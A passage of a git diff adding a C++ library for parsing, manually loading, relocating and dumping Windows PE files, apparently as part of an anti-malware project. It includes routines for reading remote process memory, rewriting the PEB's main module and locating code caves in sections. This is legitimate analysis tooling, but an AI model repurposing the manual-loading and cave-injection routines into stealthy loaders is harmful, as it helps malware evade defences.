can be directly executed: remaps to virual format, applies relocations, loads imports. + Allows for supplying custom function resolver. + */ + BYTE* load_pe_executable(BYTE* dllRawData, size_t r_size, OUT size_t &v_size, t_function_resolver* import_resolver=NULL); + + /** + Loads full PE from file in a way in which it can be directly executed: remaps to virual format, applies relocations, loads imports. + Allows for supplying custom function resolver. + */ + BYTE* load_pe_executable(const char *filename, OUT size_t &v_size, t_function_resolver* import_resolver=NULL); + +};// namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_mode_detector.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_mode_detector.h new file mode 100644 index 0000000..0cbaff7 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_mode_detector.h @@ -0,0 +1,46 @@ +/** +* @file +* @brief Detecting in which mode is the PE in the supplied buffer (i.e. raw, virtual). Analyzes PE features typical for particular modes. +*/ + +#pragma once + +#include + +#include "pe_hdrs_helper.h" + +namespace peconv { + + /** + check if the PE in the memory is in raw format + */ + bool is_pe_raw( + IN const BYTE* pe_buffer, + IN size_t pe_size + ); + + /** + check if Virtual section addresses are identical to Raw addresses (i.e. if the PE was realigned) + */ + bool is_pe_raw_eq_virtual( + IN const BYTE* pe_buffer, + IN size_t pe_size + ); + + /** + checks if the PE has sections that were unpacked/expanded in the memory + */ + bool is_pe_expanded( + IN const BYTE* pe_buffer, + IN size_t pe_size + ); + + /** + checks if the given section was unpacked in the memory + */ + bool is_section_expanded(IN const BYTE* pe_buffer, + IN size_t pe_size, + IN const PIMAGE_SECTION_HEADER sec + ); + +};// namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_raw_to_virtual.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_raw_to_virtual.h new file mode 100644 index 0000000..f351138 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_raw_to_virtual.h @@ -0,0 +1,30 @@ +/** +* @file +* @brief Converting PE from raw to virtual format. +*/ + +#pragma once + +#include +#include + +#include "buffer_util.h" + +namespace peconv { + + /** + Converts a raw PE supplied in a buffer to a virtual format. + If the executable flag is true (default), the PE file is loaded into executable memory. + Does not apply relocations. Does not load imports. + Automatically allocates buffer of the needed size (the size is returned in outputSize). The buffer can be freed by the function free_pe_module. + If the desired_base is defined (0 by default), it enforces allocation at the particular base. + */ + BYTE* pe_raw_to_virtual( + IN const BYTE* rawPeBuffer, + IN size_t rawPeSize, + OUT size_t &outputSize, + IN OPTIONAL bool executable = true, + IN OPTIONAL ULONGLONG desired_base = 0 + ); + +}; // namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_virtual_to_raw.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_virtual_to_raw.h new file mode 100644 index 0000000..fbecf3e --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/pe_virtual_to_raw.h @@ -0,0 +1,47 @@ +/** +* @file +* @brief Converting PE from virtual to raw format. +*/ + +#pragma once + +#include + +#include "buffer_util.h" + +namespace peconv { + + /** + Maps virtual image of PE to into raw. Automaticaly applies relocations. + Automatically allocates buffer of the needed size (the size is returned in outputSize). + \param payload : the PE in the Virtual format that needs to be converted into the Raw format + \param in_size : size of the input buffer (the PE in the Virtual format) + \param loadBase : the base to which the given PE was relocated + \param outputSize : the size of the output buffer (the PE in the Raw format) + \param rebuffer : if set (default), the input buffer is rebuffered and the original buffer is not modified. + \return a buffer of the outputSize, containing the Raw PE. The buffer can be freed by the function free_pe_module. + */ + BYTE* pe_virtual_to_raw( + IN BYTE* payload, + IN size_t in_size, + IN ULONGLONG loadBase, + OUT size_t &outputSize, + IN OPTIONAL bool rebuffer=true + ); + + /* + Modifies raw alignment of the PE to be the same as virtual alignment. + \param payload : the PE in the Virtual format that needs to be realigned + \param in_size : size of the input buffer + \param loadBase : the base to which the given PE was relocated + \param outputSize : the size of the output buffer (the PE in the Raw format) + \return a buffer of the outputSize, containing the realigned PE. The buffer can be freed by the function free_pe_module. + */ + BYTE* pe_realign_raw_to_virtual( + IN const BYTE* payload, + IN size_t in_size, + IN ULONGLONG loadBase, + OUT size_t &outputSize + ); + +};//namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/peb_lookup.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/peb_lookup.h new file mode 100644 index 0000000..7a5112f --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/peb_lookup.h @@ -0,0 +1,40 @@ +/** +* @file +* @brief Functions for retrieving process information from PEB. +*/ + +#pragma once + +#include + +namespace peconv { + + /** + Gets handle to the given module via PEB. A low-level equivalent of `GetModuleHandleW`. + \param module_name : (optional) the name of the DLL loaded within the current process. If not set, the main module of the current process is used. + \return the handle of the DLL with given name, or, if the name was not given, the handle of the main module of the current process. + */ + HMODULE get_module_via_peb(IN OPTIONAL LPWSTR module_name = nullptr); + + + /** + Gets size of the given module via PEB. + \param hModule : (optional) the base of the module which's size we want to retrieve. If not set, the main module of the current process is used. + \return the size of the given module. + */ + size_t get_module_size_via_peb(IN OPTIONAL HMODULE hModule = nullptr); + + /** + Sets the given module as the main module in the current PEB. + \param hModule : the module to be connected to the current PEB. + \return true if succeeded, false if failed + */ + bool set_main_module_in_peb(HMODULE hModule); + + /** + Gets the main module from the current PEB. + \return the main module connected to the current PEB. + */ + HMODULE get_main_module_via_peb(); +}; + diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/relocate.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/relocate.h new file mode 100644 index 0000000..7a7a2af --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/relocate.h @@ -0,0 +1,51 @@ +/** +* @file +* @brief Operating on PE file's relocations table. +*/ + +#pragma once + +#include + +namespace peconv { + + typedef struct _BASE_RELOCATION_ENTRY { + WORD Offset : 12; + WORD Type : 4; + } BASE_RELOCATION_ENTRY; + + class RelocBlockCallback + { + public: + RelocBlockCallback(bool _is64bit) + : is64bit(_is64bit) + { + } + + virtual bool processRelocField(ULONG_PTR relocField) = 0; + + protected: + bool is64bit; + }; + + // Processs the relocation table and make your own callback on each relocation field + bool process_relocation_table(IN PVOID modulePtr, IN SIZE_T moduleSize, IN RelocBlockCallback *callback); + + /** + Applies relocations on the PE in virtual format. Relocates it from the old base given to the new base given. + If 0 was supplied as the old base, it assumes that the old base is the ImageBase given in the header. + \param modulePtr : a buffer containing the PE to be relocated + \param moduleSize : the size of the given PE buffer + \param newBase : a base to which the PE should be relocated + \param oldBase : a base to which the PE is currently relocated (if not set, the imageBase from the header will be used) + */ + bool relocate_module(IN BYTE* modulePtr, IN SIZE_T moduleSize, IN ULONGLONG newBase, IN ULONGLONG oldBase = 0); + + /** + Checks if the given PE has a valid relocations table. + \param modulePtr : a buffer containing the PE to be checked + \param moduleSize : the size of the given PE buffer + */ + bool has_valid_relocation_table(IN const PBYTE modulePtr, IN const size_t moduleSize); + +};//namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/remote_pe_reader.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/remote_pe_reader.h new file mode 100644 index 0000000..127a519 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/remote_pe_reader.h @@ -0,0 +1,93 @@ +/** +* @file +* @brief Reading from a PE module that is loaded within a remote process. +*/ + +#pragma once + +#include + +#include "pe_hdrs_helper.h" +#include "pe_virtual_to_raw.h" +#include "exports_mapper.h" +#include "pe_dumper.h" + +namespace peconv { + + bool fetch_region_info(HANDLE processHandle, BYTE* start_addr, MEMORY_BASIC_INFORMATION &page_info); + + /** + Fetch size of the memory region starting from the given address. + */ + size_t fetch_region_size(HANDLE processHandle, BYTE* start_addr); + + /** + Fetch the allocation base of the memory region with the supplied start address. + \param processHandle : handle of the process where the region of interest belongs + \param start_addr : the address inside the region of interest + \return the allocation base address of the memory region, or 0 if not found + */ + ULONGLONG fetch_alloc_base(HANDLE processHandle, BYTE* start_addr); + + /** + Wrapper over ReadProcessMemory. Requires a handle with privilege PROCESS_VM_READ. + If reading full buffer_size was not possible, it will keep trying to read smaller chunk, + decreasing requested size by step_size in each iteration. Returns how many bytes were successfuly read. + It is a workaround for errors such as FAULTY_HARDWARE_CORRUPTED_PAGE. + */ + size_t read_remote_memory(HANDLE processHandle, BYTE *start_addr, OUT BYTE* buffer, const size_t buffer_size, const SIZE_T step_size = 0x100); + + /** + Reads the full memory area of a given size within a given process, skipping inaccessible pages. + Requires a handle with privilege PROCESS_QUERY_INFORMATION. + step_size is passed to the underlying read_remote_memory. + */ + size_t read_remote_area(HANDLE processHandle, BYTE *start_addr, OUT BYTE* buffer, const size_t buffer_size, const SIZE_T step_size = 0x100); + + /** + Reads a PE header of the remote module within the given process. Requires a valid output buffer to be supplied (buffer). + */ + bool read_remote_pe_header(HANDLE processHandle, BYTE *moduleBase, OUT BYTE* buffer, const size_t bufferSize); + + /** + Reads a PE section with a given number (sectionNum) from the remote module within the given process. + The buffer of appropriate size is automatically allocated. After use, it should be freed by the function free_unaligned. + The size of the buffer is writen into sectionSize. + \param processHandle : the handle to the remote process + \param moduleBase : the base address of the module + \param sectionNum : number of the section to be read + \param sectionSize : the size of the read section (output) + \param roundup : if set, the section size is roundup to the alignment unit + \return a buffer containing a copy of the section. + */ + peconv::UNALIGNED_BUF get_remote_pe_section(HANDLE processHandle, BYTE *moduleBase, const size_t sectionNum, OUT size_t §ionSize, bool roundup = false); + + /** + Reads PE file from the remote process into the supplied buffer. It expects the module base and size to be given. + */ + size_t read_remote_pe(const HANDLE processHandle, BYTE *moduleBase, const size_t moduleSize, OUT BYTE* buffer, const size_t bufferSize); + + /** + Dumps PE from the remote process into a file. It expects the module base and size to be given. + \param outputFilePath : the path where the dump will be saved + \param processHandle : the handle to the remote process + \param moduleBase : the base address of the module that needs to be dumped + \param dump_mode : specifies in which format the PE should be dumped. If the mode was set to PE_DUMP_AUTO, it autodetects mode and returns the detected one. + \param exportsMap : optional. If exportsMap is supplied, it will try to recover destroyed import table of the PE, basing on the supplied map of exported functions. + */ + bool dump_remote_pe( + IN const char *outputFilePath, + IN const HANDLE processHandle, + IN BYTE *moduleBase, + IN OUT t_pe_dump_mode &dump_mode, + IN OPTIONAL peconv::ExportsMapper* exportsMap = nullptr + ); + + /** + Retrieve the Image Size saved in the header of the remote PE. + \param processHandle : process from where we are reading + \param start_addr : a base address of the PE within the given process + */ + DWORD get_remote_image_size(IN const HANDLE processHandle, IN BYTE *start_addr); + +}; //namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/resource_parser.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/resource_parser.h new file mode 100644 index 0000000..d9d85d1 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/resource_parser.h @@ -0,0 +1,25 @@ +/** +* @file +* @brief Parsing PE's resource directory. +*/ + +#pragma once +#include + +namespace peconv { + /** + A callback that will be executed by the function parse_resources when the Resource Entry was found. + */ + typedef bool(*t_on_res_entry_found) ( + BYTE* modulePtr, + IMAGE_RESOURCE_DIRECTORY_ENTRY *root_dir, + IMAGE_RESOURCE_DATA_ENTRY *curr_entry + ); + + /** + A function walking through the Resource Tree of the given PE. On each Resource Entry found, the callback is executed. + \param modulePtr : pointer to the buffer with the PE in a Virtual format + \param on_entry : a callback function executed on each Resource Entry + */ + bool parse_resources(BYTE* modulePtr, t_on_res_entry_found on_entry); +}; diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/resource_util.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/resource_util.h new file mode 100644 index 0000000..8b02fd5 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/resource_util.h @@ -0,0 +1,34 @@ +/** +* @file +* @brief Functions related to manual retrieving of PE resources. +*/ + +#pragma once + +#include +#include "buffer_util.h" + +namespace peconv { + + const LPSTR RT_RCDATA_A = MAKEINTRESOURCEA(10); + + /** + Maps a resource with the given id + type and copies its raw content into the output buffer. + If out_size is not zero, it reads maximum out_size of bytes. If out_size is zero, it reads the full resource. + The actual read size is returned back in out_size. + Automatically allocates a buffer of the required size. + If hInstance is NULL, it search the resource in the current module. Otherwise, it search in the given module. + */ + peconv::ALIGNED_BUF load_resource_data(OUT size_t &out_size, const int res_id, const LPSTR res_type = RT_RCDATA_A, HMODULE hInstance = nullptr); + + /** + Free the buffer with PE Resources, mapped by the function load_resource_data. + */ + void free_resource_data(peconv::ALIGNED_BUF buffer); + + /** + a helper function to get the module handle of the current DLL + */ + HMODULE get_current_module_handle(); + +}; //namespace peconv diff --git a/ai_anti_malware/libpeconv/libpeconv/include/peconv/util.h b/ai_anti_malware/libpeconv/libpeconv/include/peconv/util.h new file mode 100644 index 0000000..f5679d3 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/include/peconv/util.h @@ -0,0 +1,25 @@ +/** +* @file +* @brief Miscellaneous utility functions. +*/ + +#pragma once + +#include "file_util.h" +#include "resource_util.h" + +namespace peconv { + /** + Checks if the given buffer is fully filled with the specified character. + \param cave_ptr : pointer to the buffer to be checked + \param cave_size : size of the buffer to be checked + \param padding_char : the required character + */ + bool is_padding(const BYTE *cave_ptr, size_t cave_size, const BYTE padding_char); + + /** + Wrapper for GetProcessId - for a backward compatibility with old versions of Windows + */ + DWORD get_process_id(HANDLE hProcess); +}; + diff --git a/ai_anti_malware/libpeconv/libpeconv/src/buffer_util.cpp b/ai_anti_malware/libpeconv/libpeconv/src/buffer_util.cpp new file mode 100644 index 0000000..d0596c6 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/buffer_util.cpp @@ -0,0 +1,87 @@ +#include "peconv/buffer_util.h" + +#include + +// +// validate pointer: +// + +bool peconv::validate_ptr(IN const void* buffer_bgn, IN SIZE_T buffer_size, IN const void* field_bgn, IN SIZE_T field_size) +{ + if (buffer_bgn == nullptr || field_bgn == nullptr) { + return false; + } + BYTE* _start = (BYTE*)buffer_bgn; + BYTE* _end = _start + buffer_size; + + BYTE* _field_start = (BYTE*)field_bgn; + BYTE* _field_end = (BYTE*)field_bgn + field_size; + + if (_field_start < _start) { + return false; + } + if (_field_end > _end) { + return false; + } + return true; +} + +//----------------------------------------------------------------------------------- +// +// alloc/free unaligned buffers: +// + +//allocates a buffer that does not have to start from the beginning of the section +peconv::UNALIGNED_BUF peconv::alloc_unaligned(size_t buf_size) +{ + if (!buf_size) return NULL; + + UNALIGNED_BUF buf = (UNALIGNED_BUF) calloc(buf_size, sizeof(BYTE)); + return buf; +} + +void peconv::free_unaligned(peconv::UNALIGNED_BUF section_buffer) +{ + free(section_buffer); +} + +// +// alloc/free aligned buffers: +// + +peconv::ALIGNED_BUF peconv::alloc_aligned(size_t buffer_size, DWORD protect, ULONGLONG desired_base, bool is_x64) +{ + if (!buffer_size) return NULL; + ALIGNED_BUF buf = (ALIGNED_BUF)VirtualAlloc((LPVOID)desired_base, buffer_size, MEM_COMMIT | MEM_RESERVE, protect); + return buf; +} + +bool peconv::free_aligned(peconv::ALIGNED_BUF buffer, size_t buffer_size) +{ + if (buffer == nullptr) return true; + if (!VirtualFree(buffer, 0, MEM_RELEASE)) { +#ifdef _DEBUG + std::cerr << "Releasing failed" << std::endl; +#endif + return false; + } + return true; +} + +//----------------------------------------------------------------------------------- +// +// wrappers using appropriate buffer type according to the purpose: +// + +// allocate a buffer for PE module: +peconv::ALIGNED_BUF peconv::alloc_pe_buffer(size_t buffer_size, DWORD protect, ULONGLONG desired_base) +{ + return alloc_aligned(buffer_size, protect, desired_base); +} + +// Free loaded PE module +bool peconv::free_pe_buffer(peconv::ALIGNED_BUF buffer, size_t buffer_size) +{ + return peconv::free_aligned(buffer, buffer_size); +} + diff --git a/ai_anti_malware/libpeconv/libpeconv/src/caves.cpp b/ai_anti_malware/libpeconv/libpeconv/src/caves.cpp new file mode 100644 index 0000000..07c69d0 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/caves.cpp @@ -0,0 +1,139 @@ +#include "peconv/caves.h" +#include "peconv/pe_hdrs_helper.h" +#include "peconv/util.h" + +using namespace peconv; + +#ifdef _DEBUG +#include +#endif + +PBYTE peconv::find_ending_cave(BYTE*modulePtr, size_t moduleSize, const DWORD minimal_size, const DWORD req_charact) +{ + size_t sec_count = peconv::get_sections_count(modulePtr, moduleSize); + if (sec_count == 0) return nullptr; + + size_t last_sec = sec_count - 1; + PIMAGE_SECTION_HEADER section_hdr = peconv::get_section_hdr(modulePtr, moduleSize, last_sec); + if (section_hdr == nullptr) return nullptr; + if (!(section_hdr->Characteristics & req_charact)) return nullptr; + + DWORD raw_size = section_hdr->SizeOfRawData; + DWORD virtual_size = (DWORD)moduleSize - section_hdr->VirtualAddress; + + if (raw_size >= virtual_size) { +#ifdef _DEBUG + std::cout << "Last section's raw_size: " << std::hex << raw_size << " >= virtual_size: " << virtual_size << std::endl; +#endif + return nullptr; + } + DWORD cave_size = virtual_size - raw_size; + if (cave_size < minimal_size) { +#ifdef _DEBUG + std::cout << "Cave is too small" << std::endl; +#endif + return nullptr; + } + PBYTE cave_ptr = modulePtr + section_hdr->VirtualAddress + section_hdr->SizeOfRawData; + if (!validate_ptr(modulePtr, moduleSize, cave_ptr, minimal_size)) { +#ifdef _DEBUG + std::cout << "Invalid cave pointer" << std::endl; +#endif + return nullptr; + } + section_hdr->SizeOfRawData += minimal_size; //book this cave + return cave_ptr; +} + +PBYTE peconv::find_alignment_cave(BYTE* modulePtr, size_t moduleSize, const DWORD minimal_size, const DWORD req_charact) +{ + DWORD alignment = peconv::get_sec_alignment(modulePtr, true); + if (alignment == 0) return nullptr; + + size_t sec_count = peconv::get_sections_count(modulePtr, moduleSize); + for (size_t i = 0; i < sec_count; i++) { + PIMAGE_SECTION_HEADER section_hdr = peconv::get_section_hdr(modulePtr, moduleSize, i); + if (section_hdr == nullptr) continue; + if (!(section_hdr->Characteristics & req_charact)) continue; + + DWORD rem = section_hdr->SizeOfRawData % alignment; + if (rem == 0) continue; + + DWORD div = (section_hdr->SizeOfRawData / alignment) + 1; + DWORD new_size = div * alignment; + DWORD cave_size = new_size - section_hdr->SizeOfRawData; + if (cave_size < minimal_size) { +#ifdef __DEBUG + std::cout << "Cave is too small" << std::endl; +#endif + continue; + } + DWORD sec_start = section_hdr->PointerToRawData; + if (sec_start == 0) continue; + + DWORD sec_end = sec_start + section_hdr->SizeOfRawData; +#ifdef _DEBUG + std::cout << "section: " << std::hex << sec_start << " : " << sec_end << std::endl; +#endif + PBYTE cave_ptr = modulePtr + sec_end; + if (!validate_ptr(modulePtr, moduleSize, cave_ptr, minimal_size)) { +#ifdef _DEBUG + std::cout << "Invalid cave pointer" << std::endl; +#endif + continue; + } + section_hdr->SizeOfRawData += minimal_size; //book this cave + return cave_ptr; + } +#ifdef _DEBUG + std::cout << "Cave not found" << std::endl; +#endif + return nullptr; +} + +PBYTE peconv::find_padding_cave(BYTE* modulePtr, size_t moduleSize, const size_t minimal_size, const DWORD req_charact) +{ + size_t sec_count = peconv::get_sections_count(modulePtr, moduleSize); + for (size_t i = 0; i < sec_count; i++) { + PIMAGE_SECTION_HEADER section_hdr = peconv::get_section_hdr(modulePtr, moduleSize, i); + if (section_hdr == nullptr) continue; + if (!(section_hdr->Characteristics & req_charact)) continue; + + if (section_hdr->SizeOfRawData < minimal_size) continue; + + // we will be searching in the loaded, virtual image: + DWORD sec_start = section_hdr->VirtualAddress; + if (sec_start == 0) continue; + + DWORD sec_end = sec_start + section_hdr->SizeOfRawData; +#ifdef _DEBUG + std::cout << "section: " << std::hex << sec_start << " : " << sec_end << std::endl; +#endif + //offset from the end of the section: + size_t cave_offset = section_hdr->SizeOfRawData - minimal_size; + PBYTE cave_ptr = modulePtr + sec_start + cave_offset; + if (!validate_ptr(modulePtr, moduleSize, cave_ptr, minimal_size)) { +#ifdef _DEBUG + std::cout << "Invalid cave pointer" << std::endl; +#endif + continue; + } + bool found = false; + if (is_padding(cave_ptr, minimal_size, 0)) { + found = true; + } + //if the section is code, check also code padding: + if (section_hdr->Characteristics & IMAGE_SCN_MEM_EXECUTE) { + if (is_padding(cave_ptr, minimal_size, 0xCC)) { + found = true; + } + } + if (found) { + return cave_ptr; + } + } +#ifdef _DEBUG + std::cout << "Cave not found" << std::endl; +#endif + return nullptr; +} diff --git a/ai_anti_malware/libpeconv/libpeconv/src/delayed_imports_loader.cpp b/ai_anti_malware/libpeconv/libpeconv/src/delayed_imports_loader.cpp new file mode 100644 index 0000000..36b5eba --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/delayed_imports_loader.cpp @@ -0,0 +1,200 @@ +#include "peconv/delayed_imports_loader.h" +#include "peconv/imports_loader.h" + +#include + +IMAGE_DELAYLOAD_DESCRIPTOR* peconv::get_delayed_imps(IN const BYTE* modulePtr, IN const size_t moduleSize, OUT size_t &dir_size) +{ + dir_size = 0; + IMAGE_DATA_DIRECTORY *d_imps_dir = peconv::get_directory_entry(modulePtr, IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT); + if (!d_imps_dir) { + return nullptr; + } + BYTE* dimps_table = (BYTE*)((ULONGLONG) modulePtr + d_imps_dir->VirtualAddress); + const size_t min_size = sizeof(IMAGE_DELAYLOAD_DESCRIPTOR); + if (d_imps_dir->Size < min_size) { + return nullptr; + } + if (!peconv::validate_ptr((LPVOID)modulePtr, moduleSize, dimps_table, min_size)) { + return nullptr; + } + dir_size = d_imps_dir->Size; + return reinterpret_cast (dimps_table); +} + +template +bool parse_delayed_desc(BYTE* modulePtr, const size_t moduleSize, + const ULONGLONG img_base, + LPSTR lib_name, + const T_FIELD ordinal_flag, + IMAGE_DELAYLOAD_DESCRIPTOR *desc, + peconv::t_function_resolver* func_resolver +) +{ + ULONGLONG iat_addr = desc->ImportAddressTableRVA; + + if (iat_addr > img_base) iat_addr -= img_base; // it may be either RVA or VA + + ULONGLONG thunk_addr = desc->ImportNameTableRVA; + if (thunk_addr > img_base) thunk_addr -= img_base; // it may be either RVA or VA + + T_FIELD* record_va = (T_FIELD*)((ULONGLONG)modulePtr + iat_addr); + T_IMAGE_THUNK_DATA* thunk_va = (T_IMAGE_THUNK_DATA*)((ULONGLONG)modulePtr + thunk_addr); + + for (; *record_va != NULL && thunk_va != NULL; record_va++, thunk_va++) { + if (!peconv::validate_ptr(modulePtr, moduleSize, record_va, sizeof(T_FIELD))) { + return false; + } + if (!peconv::validate_ptr(modulePtr, moduleSize, thunk_va, sizeof(T_FIELD))) { + return false; + } + + T_FIELD iat_va = *record_va; + ULONGLONG iat_rva = (ULONGLONG)iat_va; + if (iat_va > img_base) iat_rva -= img_base; // it may be either RVA or VA +#ifdef _DEBUG + std::cout << std::hex << iat_rva << " : "; +#endif + T_FIELD* iat_record_ptr = (T_FIELD*)((ULONGLONG)modulePtr + iat_rva); + if (!peconv::validate_ptr(modulePtr, moduleSize, iat_record_ptr, sizeof(T_FIELD))) { + return false; + } + FARPROC hProc = nullptr; + if (thunk_va->u1.Ordinal & ordinal_flag) { + T_FIELD raw_ordinal = thunk_va->u1.Ordinal & (~ordinal_flag); +#ifdef _DEBUG + std::cout << std::hex << "ord: " << raw_ordinal << " "; +#endif + hProc = func_resolver->resolve_func(lib_name, MAKEINTRESOURCEA(raw_ordinal)); + } + else { + ULONGLONG name_rva = thunk_va->u1.AddressOfData; + if (name_rva > img_base) { + name_rva -= img_base; + } + PIMAGE_IMPORT_BY_NAME by_name = (PIMAGE_IMPORT_BY_NAME)((ULONGLONG)modulePtr + name_rva); + LPSTR func_name = reinterpret_cast(by_name->Name); + if (!peconv::is_valid_import_name(modulePtr, moduleSize, func_name)) { + continue; + } +#ifdef _DEBUG + std::cout << func_name << " "; +#endif + hProc = func_resolver->resolve_func(lib_name, func_name); + } + if (hProc) { + //rather than loading it via proxy function, we just overwrite the thunk like normal IAT: + *record_va = (T_FIELD) hProc; +#ifdef _DEBUG + std::cout << "[OK]\n"; +#endif + } + else { +#ifdef _DEBUG + std::cout << "[NOPE]\n"; +#endif + } + } + return true; +} +bool peconv::load_delayed_imports(BYTE* modulePtr, ULONGLONG moduleBase, t_function_resolver* func_resolver) +{ + const bool is_64bit = peconv::is64bit(modulePtr); + const size_t module_size = peconv::get_image_size(modulePtr); + default_func_resolver default_res; + if (!func_resolver) { + func_resolver = (t_function_resolver*)&default_res; + } + size_t table_size = 0; + IMAGE_DELAYLOAD_DESCRIPTOR* first_desc = get_delayed_imps(modulePtr, module_size, table_size); + if (!first_desc) { + return false; + } +#ifdef _DEBUG + std::cout << "OK, table_size = " << table_size << std::endl; +#endif + size_t max_count = table_size / sizeof(IMAGE_DELAYLOAD_DESCRIPTOR); + for (size_t i = 0; i < max_count; i++) { + IMAGE_DELAYLOAD_DESCRIPTOR* desc = &first_desc[i]; + if (!validate_ptr(modulePtr, module_size, desc, sizeof(IMAGE_DELAYLOAD_DESCRIPTOR))) break; + if (desc->DllNameRVA == NULL) { + break; + } + ULONGLONG dll_name_rva = desc->DllNameRVA; + if (dll_name_rva > moduleBase) { + dll_name_rva -= moduleBase; + } + char* dll_name = (char*)((ULONGLONG)modulePtr + dll_name_rva); + if (!validate_ptr(modulePtr, module_size, dll_name, sizeof(char))) continue; +#ifdef _DEBUG + std::cout << dll_name << std::endl; +#endif + if (is_64bit) { + return parse_delayed_desc(modulePtr, module_size, moduleBase, dll_name, IMAGE_ORDINAL_FLAG64, desc, func_resolver); + } + else { + return parse_delayed_desc(modulePtr, module_size, moduleBase, dll_name, IMAGE_ORDINAL_FLAG32, desc, func_resolver); + } + } + return true; +} +/* +bool peconv::load_delayed_imports(BYTE* modulePtr, ULONGLONG moduleBase, t_function_resolver* func_resolver) +{ + const bool is_64bit = peconv::is64bit(modulePtr); + bool is_loader64 = false; +#ifdef _WIN64 + is_loader64 = true; +#endif + if (is_64bit != is_loader64) { + std::cerr << "[ERROR] Loader/Payload bitness mismatch.\n"; + return false; + } + + const size_t module_size = peconv::get_image_size(modulePtr); + default_func_resolver default_res; + if (!func_resolver) { + func_resolver = (t_function_resolver*)&default_res; + } + size_t table_size = 0; + IMAGE_DELAYLOAD_DESCRIPTOR *first_desc = get_delayed_imps(modulePtr, module_size, table_size); + if (!first_desc) { + return false; + } +#ifdef _DEBUG + std::cout << "OK, table_size = " << table_size << std::endl; +#endif + size_t max_count = table_size / sizeof(IMAGE_DELAYLOAD_DESCRIPTOR); + for (size_t i = 0; i < max_count; i++) { + IMAGE_DELAYLOAD_DESCRIPTOR *desc = &first_desc[i]; + if (!validate_ptr(modulePtr, module_size, desc, sizeof(IMAGE_DELAYLOAD_DESCRIPTOR))) break; + if (desc->DllNameRVA == NULL) { + break; + } + ULONGLONG dll_name_rva = desc->DllNameRVA; + if (dll_name_rva > moduleBase) { + dll_name_rva -= moduleBase; + } + char* dll_name = (char*)((ULONGLONG) modulePtr + dll_name_rva); + if (!validate_ptr(modulePtr, module_size, dll_name, sizeof(char))) continue; +#ifdef _DEBUG + std::cout << dll_name << std::endl; +#endif + if (is_64bit) { +#ifdef _WIN64 + parse_delayed_desc(modulePtr, module_size, moduleBase, dll_name, IMAGE_ORDINAL_FLAG64, desc, func_resolver); +#else + return false; +#endif + } + else { +#ifndef _WIN64 + parse_delayed_desc(modulePtr, module_size, moduleBase, dll_name, IMAGE_ORDINAL_FLAG32, desc, func_resolver); +#else + return false; +#endif + } + } + return true; +} +*/ \ No newline at end of file diff --git a/ai_anti_malware/libpeconv/libpeconv/src/exported_func.cpp b/ai_anti_malware/libpeconv/libpeconv/src/exported_func.cpp new file mode 100644 index 0000000..f425782 --- /dev/null +++ b/ai_anti_malware/libpeconv/libpeconv/src/exported_func.cpp @@ -0,0 +1,176 @@ +#include "peconv/exported_func.h" + +#include +#include +#include +#include + +using namespace peconv; + +std::string peconv::get_dll_shortname(const std::string& str) +{ + std::size_t len = str.length(); + std::size_t found = str.find_last_of("/\\"); + std::size_t ext = str.find_last_of('.'); + if (ext >= len) return ""; + + std::string name = str.substr(found+1, ext - (found+1)); + std::transform(name.begin(), name.end(), name.begin(), tolower); + return name; +} + +size_t peconv::forwarder_name_len(BYTE* fPtr) +{ + // names can be also mangled, i.e. MSVCRT.??0__non_rtti_object@std@@QAE@ABV01@@Z + bool has_dot = false; + size_t len = 0; + while ((*fPtr >= 'a' && *fPtr <= 'z') + || (*fPtr >= 'A' && *fPtr <= 'Z') + || (*fPtr >= '0' && *fPtr <= '9') + || (*fPtr == '.') + || (*fPtr == '_') + || (*fPtr == '#') + || (*fPtr == '@') + || (*fPtr == '?') + || (*fPtr == '-')) + { + if (*fPtr == '.') has_dot = true; + len++; + fPtr++; + } + if (*fPtr == '\0') { + if (!has_dot) { + return 0; //this is not a valid forwarder + } + return len; + } + return 0; +} + +std::string peconv::get_func_name(const std::string& str) +{ + std::size_t len = str.length(); + std::size_t ext = str.find_last_of("."); + if (ext >= len) return ""; + + std::string name = str.substr(ext+1, len - (ext+1)); + return name; +} + +std::string peconv::ordinal_to_string(DWORD func_ordinal) +{ + std::stringstream stream; + stream << "#"; + stream << std::dec << func_ordinal; + return stream.str(); +} + +bool peconv::is_ordinal_string(const std::string& func_name_str) +{ + if (func_name_str.length() < 2) return false; + return (func_name_str[0] == '#'); +} + +DWORD peconv::ordinal_string_to_val(const std::string& func_name_str) +{ + if (!is_ordinal_string(func_name_str)) return 0; + const char* func_name = func_name_str.c_str(); + return atoi(func_name + 1); +} + +std::string peconv::format_dll_func(const std::string& str) +{ + std::string dllName = get_dll_shortname(str); + std::string funcName = get_func_name(str); + if (dllName.length() == 0 || funcName.length() == 0) { + return ""; + } + 